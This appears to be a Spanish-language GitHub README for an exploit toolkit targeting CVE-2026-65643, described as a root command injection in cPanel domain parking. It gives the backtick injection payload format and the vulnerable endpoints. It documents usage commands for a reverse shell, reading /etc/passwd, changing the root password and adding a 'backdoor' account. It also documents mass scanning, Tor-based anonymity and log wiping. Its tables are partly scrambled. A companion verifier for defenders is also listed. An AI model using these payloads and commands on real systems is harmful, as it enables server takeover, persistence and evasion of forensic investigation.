
Kit de herramientas para equipo Red/Blue para CVE-2026-65643, una RCE de estacionamiento de dominios en cPanel. Incluye exploit con reverse shell, webshell, persistencia y escaneo masivo, además de un verificador no intrusivo para detección y auditoría.

⚠️ USO EXCLUSIVAMENTE ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, equipos azules y probadores de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Ley de Uso Indebido de Computadoras (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.
CVE‑2026‑65643 es una vulnerabilidad crítica de inyección de comandos en cPanel & WHM versiones 11.x que permite a un usuario autenticado de cPanel ejecutar comandos arbitrarios del sistema con privilegios de root a través de la funcionalidad de dominio en estacionamiento (domain parking).
`).| Herramienta | Propósito | Usuario previsto |
|---|---|---|
exploit.py | Kit de herramientas completo armado con shell inversa, webshell, persistencia, lectura/escritura de archivos, cambio de contraseña de root, escaneo masivo, soporte Tor y funciones OPSEC. |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.pyverifier.pyEl exploit utiliza los siguientes endpoints y métodos de inyección de cPanel:
# Formato del payload de inyección
test.com`<comando>`
# Ejemplo
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.
| Equipos rojos / pentesters autorizados |
verifier.py | Comprobador de vulnerabilidades no intrusivo que detecta la versión de cPanel, valida la inyección y evalúa el riesgo sin ejecutar ningún payload malicioso. Genera informes detallados. | Equipos azules / auditores de seguridad |
| Característica | exploit.py | verifier.py |
|---|
| Detección de vulnerabilidades | ✅ | ✅ |
| Detección de versión (4 endpoints) | ✅ | ✅ |
| Inyección de comandos | ✅ | ❌ |
| Shell inversa | ✅ | ❌ |
| Subida de WebShell | ✅ | ❌ |
| Persistencia (creación de usuario cPanel) | ✅ | ❌ |
| Cambio de contraseña de root | ✅ | ❌ |
| Lectura/escritura de archivos | ✅ | ❌ |
| 4 métodos de inyección (JSON/Form/CGI/API2) | ✅ | ✅ |
| Soporte Tor (anonimato) | ✅ | ❌ |
| Rotación de User‑Agent (OPSEC) | ✅ | ❌ |
| Jitter (OPSEC) | ✅ | ❌ |
| Escaneo masivo (multi‑hilo) | ✅ | ❌ |
| Shell interactiva | ✅ | ❌ |
| Modo no intrusivo (seguro) | ❌ | ✅ |
| Registro de línea de tiempo | ✅ | ✅ |
| Informe HTML | ✅ | ❌ |
| Informe JSON | ✅ | ✅ |
| Limpieza de registros (anti‑forense) | ✅ | ✅ |
| Soporte de proxy | ✅ | ✅ |
| User‑Agent personalizado | ✅ | ✅ |
| Control de verificación SSL | ✅ | ✅ |
| Escenario | Herramienta recomendada |
|---|
| Equipo azul – verificar si su instalación de cPanel es vulnerable | verifier.py |
| Auditoría de seguridad – evaluación de vulnerabilidades no intrusiva | verifier.py |
| Equipo rojo – pruebas de penetración autorizadas con explotación completa | exploit.py |
| Bug Bounty – pruebas de divulgación responsable | verifier.py |
| Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidades | exploit.py (solo detección) |
| Respuesta a incidentes – comprobar si los sistemas están comprometidos | verifier.py |
| Parámetro | Descripción |
|---|
-t, --target | URL de cPanel objetivo (p. ej. https://cpanel.example.com:2083) |
-l, --target-file | Archivo que contiene la lista de objetivos (uno por línea) para escaneo masivo |
-u, --username | Nombre de usuario de cPanel |
-P, --password | Contraseña de cPanel |
-p, --port | Sobrescribir el puerto de cPanel (por defecto el de la URL o 2083) |
--threads | Número de hilos para múltiples objetivos (por defecto: 10) |
-o, --output | Guardar informe JSON en un archivo |
--html-report | Guardar informe HTML en un archivo |
-v, --verbose | Salida detallada |
--proxy | Proxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080) |
--tor | Enrutar a través de Tor (localhost:9050) |
-ua, --user-agent | User‑Agent personalizado |
--no-keep-alive | No mantener la sesión activa |
--delay | Retardo entre solicitudes (por defecto: 2.0s) |
--jitter | Jitter aleatorio (0‑1 s) entre solicitudes (por defecto: 0.5) |
--max-retries | Reintentos máximos (por defecto: 5) |
--ssl-verify | Verificar certificados SSL |
--timeout | Tiempo de espera de la solicitud (por defecto: 15s) |
--cmd | Ejecutar un único comando en el objetivo |
--reverse-shell | Shell inversa IP:PUERTO |
--passwd | Cambiar la contraseña de root |
--adduser | Crear usuario de cPanel (USUARIO DOMINIO CONTRASEÑA) |
--read | Leer un archivo |
--write | Escribir un archivo (especificar ruta) |
--write-content | Contenido a escribir |
--cleanup | Limpiar registros e historial después de la explotación |
-i, --interactive | Shell interactiva después de la explotación |
--domain-suffix | Sufijo para el dominio en estacionamiento (por defecto: exploit.local) |
| Parámetro | Descripción |
|---|
-t, --target | URL de cPanel objetivo (p. ej. https://cpanel.example.com:2083) |
-u, --username | Nombre de usuario de cPanel |
-P, --password | Contraseña de cPanel |
-o, --output | Guardar informe JSON en un archivo |
-v, --verbose | Salida detallada |
--proxy | Proxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080) |
--tor | Enrutar a través de Tor (localhost:9050) |
--ssl-verify | Verificar certificados SSL |
--timeout | Tiempo de espera de la solicitud (por defecto: 15s) |
--cleanup | Limpiar registros después de la prueba |
| # | Escenario | Comando |
|---|
| 1 | Comprobación rápida de vulnerabilidad | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | Escaneo detallado con informe | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | Shell inversa | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | Ejecutar comando | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | Leer archivo sensible | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | Cambiar contraseña de root | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | Crear nuevo usuario de cPanel (persistencia) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Shell interactiva después de la explotación | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | Escaneo masivo desde archivo | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | Usar proxy, Tor y User‑Agent personalizado | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | Limpiar registros después de la explotación | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| Método | Endpoint | Descripción |
|---|
| API JSON | /cpsessXXXXX/json-api/domain | Método de inyección principal mediante payload JSON |
| Datos de formulario | /cpsessXXXXX/json-api/domain | Inyección alternativa mediante datos codificados en formulario |
| Script CGI | /cgi-sys/domainpark.cgi | Inyección en endpoint CGI heredado |
| API2 | /cpsessXXXXX/json-api/cpanel | Método de inyección API2 heredado |